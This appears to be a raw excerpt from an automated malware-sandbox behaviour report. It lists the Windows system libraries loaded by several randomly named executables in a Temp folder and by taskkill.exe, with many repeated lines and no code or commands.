Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
